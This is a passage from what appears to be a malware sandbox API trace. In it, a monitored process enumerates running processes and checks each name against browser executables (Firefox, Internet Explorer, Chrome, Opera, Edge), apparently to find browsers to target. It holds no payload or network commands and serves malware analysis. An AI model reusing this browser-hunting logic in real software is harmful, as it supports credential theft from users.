pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0234.917] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0234.917] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0234.917] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0234.917] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0234.917] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.917] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0234.918] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0234.918] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0234.918] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0234.918] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0234.918] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.918] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0234.918] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0234.918] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0234.918] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0234.918] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0234.918] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.918] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0234.919] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0234.919] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0234.919] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0234.919] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0234.919] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.919] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0234.919] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0234.919] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0234.919] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0234.920] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0234.920] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.920] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0234.920] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0234.920] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0234.920] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0234.920] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0234.920] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.920] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0234.921] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0234.921] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0234.921] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0234.921] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0234.921] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.921] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0234.921] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0234.921] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0234.921] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0234.921] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0234.921] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.921] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.922] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0234.922] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0234.922] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0234.922] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0234.922] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.922] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.922] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0234.922] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0234.923] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0234.923] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0234.923] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.923] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.923] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0234.923] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0234.923] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0234.923] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0234.923] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.923] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.924] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0234.924] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0234.924] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0234.924] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0234.924] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.924] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.924] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0234.924] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0234.924] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0234.924] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0234.924] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.924] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0234.925] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0234.925] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0234.925] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0234.925] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0234.925] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.925] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.926] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0234.926] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0234.926] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0234.926] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0234.926] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.926] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.926] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0234.926] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0234.926] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0234.926] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0234.926] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.926] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0234.927] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0234.927] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0234.927] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0234.927] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0234.927] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.927] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0234.927] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0234.927] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0234.927] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0234.927] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0234.927] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.927] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0234.928] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0234.928] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0234.928] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0234.928] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0234.928] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.928] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.929] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0234.929] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0234.929] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0234.929] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0234.929] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.929] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0234.929] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0234.929] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0234.929] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0234.929] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0234.929] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.929] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0234.930] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0234.930] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0234.930] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0234.930] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0234.930] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.930] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0234.930] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0234.930] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0234.930] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0234.930] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0234.931] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.931] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0234.931] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0234.931] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0234.931] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0234.931] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0234.931] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.931] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0234.932] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0234.932] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0234.932] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0234.932] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0234.932] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.932] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0234.932] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0234.932] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0234.932] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0234.932] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0234.932] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.932] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0234.933] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0234.933] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0234.933] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0234.933] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0234.933] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.933] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0234.933] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0234.933] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0234.933] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0234.934] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0234.934] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.934] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0234.934] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0234.934] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0234.934] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0234.934] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0234.934] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.934] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0234.935] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0234.935] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0234.935] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0234.935] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0234.935] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.935] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0234.935] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0234.935] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0234.935] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0234.935] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0234.935] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.935] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0234.936] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0234.936] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0234.936] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0234.936] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0234.936] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.936] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0234.936] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0234.936] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0234.936] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0234.937] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0234.937] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.937] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0234.937] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0234.937] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0234.937] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0234.937] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0234.937] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.937] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0234.938] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0234.938] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0234.938] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0234.938] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0234.938] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.938] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0234.938] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0234.938] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0234.938] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0234.938] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0234.938] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.938] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0234.939] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0234.939] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0234.939] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0234.939] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0234.939] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.939] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: 